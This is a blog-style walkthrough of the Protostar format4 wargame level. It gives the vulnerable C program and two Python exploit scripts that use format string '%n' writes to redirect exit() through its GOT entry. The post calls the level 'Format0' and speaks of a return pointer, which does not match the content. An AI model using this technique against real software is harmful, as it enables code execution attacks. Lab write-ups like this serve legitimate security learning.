Hello Guyz,
Welcome again to my blog. Today, I am going to share with you my walkthrough experience of Exploit-Exercise Protostar Format0 Level.
In this level, Our goal is to overwrite Return pointer Address And So, That In Future We can use This Vulnerability To Execute Our Injected Shellcodes. Actually, We just need to prove that with this vulnerability we can overwrite the EIP register but here comes another difficulty of this level. As Already mentioned in the hint
We have to use Format String Vulnerability To Overwrite our Instruction Pointer Register.
After Searching, About this vulnerability, I found below-mentioned articles very useful. So, Use below mention links as the reference of format string vulnerability.
1.
OWASP2.
StackOverflow3.
PDFBefore Starting Our Walkthrough Let's Take a Look At Hints And Details.Note: I want to highlight Few Points.
- I'm not the creator of protostar war game. I am just a player.
- Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
- Understand all previous levels before starting this one.
- Do some research on Assembly, C/C++ and Gdb
Source Code
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int target;
void hello()
{
printf("code execution redirected! you win\n");
_exit(1);
}
void vuln()
{
char buffer[512];
fgets(buffer, sizeof(buffer), stdin);
printf(buffer);
exit(1);
}
int main(int argc, char **argv)
{
vuln();
}
Hint
%p format4 looks at one method of redirecting execution in a process.
Hints
objdump -TR is your readers
This level is at /opt/protostar/bin/format4
Exploit
#!/usr/bin/python
import struct
# print format4.py | ./format4
# Number Of Bytes
p3 = "%33953x%4$n"
p3+= "%33616x%5$n"
# Want To Write 0x080484b4 Into Below Address [Printf GOT].
p1 = struct.pack("I", 0x08049724)
p2 = struct.pack("I", 0x08049726)
p2+= "%x%x"
print p1+p2+p3
Exploit (Alternate Way)
#!/usr/bin/python
import struct
# print format4.py | ./format4
# =================================================
# Format4 [Fill in 4 Parts ]
# =================================================
# [Step One] Analyse Paddings
p1 = "aaaa"
p2 = "%x%x%x"
p3 = "%x"
#print p1+p2+p3
padding = 4
# [Step Two] Check Padding
# print p1+"%"+str(padding)+"$x"
# [Step Three] Install Our malicios address into the stack in 4 parts
#
# Findout Dynamic allocation address of exit command using objdump -TR format4
# 0x08049724
p = ''
p+= struct.pack("I", 0x08049724)
p+= struct.pack("I", 0x08049725)
p+= struct.pack("I", 0x08049726)
p+= struct.pack("I", 0x08049727)
# Need To fill 0x080484b4
p+= "%164x" # first padding
p+= "%4$n"
p+= "%208x" # Second padding
p+= "%5$n"
p+= "%128x" # third padding
p+= "%6$n"
p+= "%260x" # fourth padding
p+= "%7$n"
print p